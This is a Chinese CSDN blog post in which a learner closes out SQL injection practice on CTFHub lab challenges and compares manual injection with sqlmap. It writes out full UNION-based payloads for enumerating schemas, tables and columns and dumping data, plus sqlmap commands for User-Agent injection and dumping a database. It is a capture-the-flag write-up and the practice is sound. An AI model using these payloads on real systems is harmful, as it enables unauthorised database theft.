sql注入完结?

已于 2022-06-30 20:24:06 修改
阅读量313 收藏
点赞数 1
分类专栏: 萌新自学笔记 文章标签: 网络安全
于 2022-06-30 20:23:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hk41666/article/details/125547587
版权

终于搞完了,对比了一下手写和sqlmap,我发现对于这种做题,真的除了盲注还是用手写更快一点,因为这玩意根本不带注入点的,还得自己写,还得为一个不存在的id配合sqlmap的选择,然后sqlmap又炸了,还是自己手写写某些简单。

特别是这个UA搞了我好久用sqlmap写半天不兼容,文件一直报错麻了

学了这么久的sql注入终于学完了,应该能拿个70分吧(想peach)下一步学其他的咯。 

除了bool盲注直接丢给sqlmap是最好的,其他方法都可以用万能的步骤

这是union的

id=1 and 1=2 union select 1,group_concat(schema_name) from information_schema.schemata

id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema ="sqli"

表merzhlhmyg

id=1 and 1=2 union select 1,column_name from information_schema.columns where table_name ="merzhlhmyg"

列rsonbzfqgd

id=1 and 1=2 union select 1,rsonbzfqgd from sqli.merzhlhmyg

报错处理直接把updatexml函数就行,代码原理都是一样,直接丢给sqlmap.

建议抓包
抓包数据的


get头要有注入点,写也得写个id=1.

且需要设置参数和cookie不同:
复制来的
sqlmap -r “a.txt” -p “User-Agent” –dbms mysql -p指定User-Agent参数指定username参数,-dbms指定了数据库

level设置3
url: CTFHub 环境实例 | 提示信息
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0

错误//sqlmap -u "CTFHub 环境实例 | 提示信息" --header "iMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0" --level 3

sqlmap.py -r "1.txt" -p "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0" -level 3
sqlmap.py -r "1.txt" -level 3
sqlmap.py -u "challenge-edc12a985d8c775d.sandbox.ctfhub.com:10800"
sqlmap.py -r "2.txt" -level 3 -D sqli --dump --batch

妈的发现文本有问题,直接换手写,服了

id=1 and 1=2 union select 1,group_concat(schema_name) from information_schema.schemata

id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema ="sqli"

得到表ejwxqvuckx

id=1 and 1=2 union select 1,column_name from information_schema.columns where table_name ="ejwxqvuckx"

得到列kerelgnjvp

id=1 and 1=2 union select 1,kerelgnjvp from sqli.ejwxqvuckx

累死浪费一个小时了

hk41666
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
什么是SQL注入攻击?
南_茗的博客
05-18 4130
所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
sql注入详解
热门推荐
yy
05-05 19万+
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
MyBatis是如何防止SQL注入的?
weixin_43481234的博客
10-25 4024
什么是SQL注入? sql存在漏洞,会被攻击,导致数据泄露 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 如果程序员信息安全意识不强,采用动态构造SQL语句访问数据库,并且对用户的输入未进行有效性验证,则存在SQL注入漏洞的可能性很大。一般通过页面的报错信息来确定是否存在SQL注入漏洞
SQL注入攻击介绍
99度灰的博客
03-30 2万+
SQL注入攻击介绍 一、SQL注入攻击简介 SQL注入攻击是指,后台数据库操作时,如果拼接外部参数到SQL语句中,就可能导致欺骗服务器执行恶意的SQL语句,造成数据泄露、删库、页面篡改等严重后果。按变量类型分为:数字型、字符型;按HTTP提交方式分为:GET注入、POST注入、Cookie注入;按注入方式分为:报错注入、盲注(布尔盲注、时间盲注)、堆叠注入等等。 二、SQL注入分类 按变量类型分类:如SQL语句为select *from user where param=1(数字型)、select *fr
SQL 注入攻击介绍
代码星辰的博客
03-12 4542
SQL 注入攻击介绍
SQL注入是什么,怎么防止SQL注入
csdn_4399的博客
08-09 6898
学习目标: 提示:这里可以添加学习目标 例如:一周掌握 Java 入门知识 学习内容: 提示:这里可以添加要学的内容 例如: 1、 搭建 Java 开发环境 2、 掌握 Java 基本语法 3、 掌握条件语句 4、 掌握循环语句 学习时间: 提示:这里可以添加计划学习的时间 例如: 1、 周一至周五晚上 7 点—晚上9点 2、 周六上午 9 点-上午 11 点 3、 周日下午 3 点-下午 6 点 学习产出: 提示:这里统计学习计划的总量 例如: 1、 技术笔记 2 遍 2、CSDN 技术博客 3 篇
什么是SQL注入攻击,解释如何防范SQL注入攻击?
fengyege的博客
08-30 4514
SQL注入攻击是一种常见的网络攻击方式,攻击者通过在Web应用程序的查询语句中插入恶意代码,从而获取数据库中的敏感信息或者执行其他恶意操作。使用参数化查询:使用参数化查询可以避免攻击者通过查询语句中的参数注入恶意代码。参数化查询是一种预编译的查询语句,它通过传递参数而不是直接执行查询语句来执行查询。过滤输入数据:在接收用户输入的数据时,应该对数据进行过滤,删除非法字符和特殊字符。可以使用正则表达式或者白名单过滤器来过滤数据。
mybatis如何防止SQL注入
m0_61802230的博客
05-17 8399
sql注入发生的时间,sql注入发生的阶段在sql预编译阶段,当编译完成的sql不会产生sql注入 一、采用jdbc操作数据时候 String sql = "update ft_proposal set id = "+id; PreparedStatement prepareStatement = conn.prepareStatement(sql); prepareStatement.executeUpdate(); preparedStatement 预编译对象会对传入sql进行预编译,那么当传入.
怎么防止SQL注入
。。。。
03-21 6872
防止SQL注入攻击的方法是使用参数化查询,也就是使用预编译语句(Prepared Statement)或者存储过程(Stored Procedure)来处理 SQL 查询语句。 使用预编译语句的好处是,它会将 SQL 查询语句和参数分开,从而避免了恶意用户通过参数注入恶意 SQL 代码的风险。同时,预编译语句可以有效地缓存 SQL 查询语句,提高查询性能。
SQL注入
m0_51457307的博客
11-08 2万+
一、什么是SQL注入 SQL注入(SQL lnjection)是发生在Web程序中数据库层的安全漏洞,是比较常用的网络攻击方式之一,他不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至修改数据库。也就是说,SQL注入就是在用户输入的字符串中添加SQL语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的SQL语句就会被数据库服务器误认为是正常的SQL语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。 二、SQL注入的原理 1.恶意拼接查
如何防止sql注入
12-14
发现SQL注入位置;判断服务器类型和后台数据库类型;确定可执行情况  对于有些攻击者而言,一般会采取sql注入法。下面我也谈一下自己关于sql注入法的感悟。  注入法:  从理论上说,认证网页中会有型如:  ...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
SQL 注入天书.pdf
08-06
SQL 注入学习天书
pangolinsdl—sql注入工具
06-20
pangolinsdl—sql注入工具 很好用的sql注入工具 界面简洁好用 使用方便
JDBC如何有效防止SQL注入
12-14
在我们平时的开发中,作为新手写JDBC很有可能忽略了一点,那是根本没有考虑SQL注入的问题,  那么,什么是SQL注入,以及如何防止SQL注入的问题。  一什么是SQL注入  所谓SQL注入,是通过把SQL命令插入到Web...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8252
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Java开发案例-springboot-66-自定义starter-源代码+文档.rar
05-31
Java开发案例-springboot-66-自定义starter-源代码+文档.rar Java开发案例-springboot-66-自定义starter-源代码+文档.rar Java开发案例-springboot-66-自定义starter-源代码+文档.rar Java开发案例-springboot-66-自定义starter-源代码+文档.rar Java开发案例-springboot-66-自定义starter-源代码+文档.rar Java开发案例-springboot-66-自定义starter-源代码+文档.rar
单家独院式别墅图纸D027-三层-12.80&10.50米-施工图.dwg
05-31
单家独院式别墅图纸D027-三层-12.80&10.50米-施工图.dwg
啦啦啦啦啦啦啦啦啦啦啦啦啦啦啦
最新发布
05-31
啦啦啦啦啦啦啦啦啦啦啦啦啦啦啦
如何防止SQL注入攻击?
03-04
防止SQL注入攻击是非常重要的,以下是一些常见的防御措施: 1. 使用参数化查询或预编译语句:使用参数化查询可以将用户输入的数据与SQL语句分开处理,从而避免了直接将用户输入拼接到SQL语句中的风险。 2. 输入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值